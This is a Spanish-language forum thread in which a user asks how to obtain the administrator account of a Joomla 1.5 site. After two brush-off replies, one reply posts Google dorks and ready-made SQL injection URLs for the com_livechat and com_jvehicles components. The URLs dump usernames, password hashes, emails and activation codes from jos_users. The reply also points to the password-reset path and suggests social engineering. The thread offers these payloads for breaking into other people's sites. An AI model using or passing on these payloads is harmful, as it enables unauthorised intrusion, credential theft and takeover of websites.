[SOLUCIONADO] Ayuda , Sacar admin de Joomla 1.5

Iniciado por WhitePag, Agosto 10, 2011, 02:20:29 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Agosto 10, 2011, 02:20:29 AM Ultima modificación: Febrero 09, 2015, 12:13:38 PM por Expermicid
Buenas , tengo una duda , como puedo hacer para sacar el admin de una pagina que tiene joomla 1.5? mediante sql o como?
si me pueden dejar un link o tuto mucho mejor
Muchas Gracias!
Agosto 10, 2011, 10:07:22 AM #1
 ??? La manera más facil es que se lo pidas al Administrador  ::) al menos que te tomes el tiempo de buscar en San Google o en el Foro algunos Manuales o VideoTutoriales, te recomiendo buscar los VideoTutoriales de Xt3mP.
Hazlo todo tan simple como sea posible, pero no más simple. Albert Einstein
Agosto 10, 2011, 01:00:42 PM #2
Primero aprende a usar el Google. Como dice el RandomSoft, hay muchos tutoriales sobre el tema, tan solo buscalos.

Agosto 11, 2011, 06:57:49 PM #3
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
depende men que bug tenga mira aqui te doy algo que te ayudaria

Código: text
Dork: allinurl:index.php?option=com_livechat

Exploit: /administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1%20union%20select%201,unhex%28hex%28concat%28username,0x3a,password%29%29%29,3%20from%20jos_users

Dork: allinurl:index.php?option=com_livechat

Exploit: /index.php?option=com_user&view=reset&layout=confirm



--------------------------------------------------------------------

Dorks : inurl:option=com_jvehicles inurl:com_jvehicles

######### Exploit nr 1 ############

index.php?option=com_jvehicles&task=agentlisting&aid=62 /**/ AND /**/ 1=0 /**/ UNION /**/ ALL /**/ SELECT /**/ 1, /**/ 2, /**/ version(), /**/ 4, /**/ group_concat(username,0x3a,email), /**/ 6, /**/ 7, /**/ 8, /**/ 9, /**/ 10, /**/ 11, /**/ 12, /**/ 13, /**/ 14, /**/ 15, /**/ 16, /**/ 17, /**/ 18, /**/ 19, /**/ 20, /**/ 21, /**/ 22, /**/ 23, /**/ 24, /**/ 25, /**/ 26, /**/ 27, /**/ 28, /**/ 29, /**/ 30, /**/ 31, /**/ 32 from+jos_users--

######## Exploit Nr 2 ############

index.php?option=com_jvehicles&task=agentlisting&aid=62 /**/ AND /**/ 1=0 /**/ UNION /**/ ALL /**/ SELECT /**/ 1, /**/ 2, /**/ version(), /**/ 4, /**/ group_concat(username,0x3a,activation), /**/ 6, /**/ 7, /**/ 8, /**/ 9, /**/ 10, /**/ 11, /**/ 12, /**/ 13, /**/ 14, /**/ 15, /**/ 16, /**/ 17, /**/ 18, /**/ 19, /**/ 20, /**/ 21, /**/ 22, /**/ 23, /**/ 24, /**/ 25, /**/ 26, /**/ 27, /**/ 28, /**/ 29, /**/ 30, /**/ 31, /**/ 32 from+jos_users--


/index.php?option=com_user&view=reset


No creo que le sirvan porque los dos estan basados en componentes especificos (com_livechat, com_jvehicles) y no en vulnerabilidades nativas (que son muy escazas por no decir cada ves mas imposibles de encontrar)

De todas maneras si es buena idea que busques los componentes instalados y trates inyecciones varias y tal... si no quizas puedas sacar el adm con ingenieria social.

=) saludos

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Imprimir
Ir Arriba Páginas1
Acciones del Usuario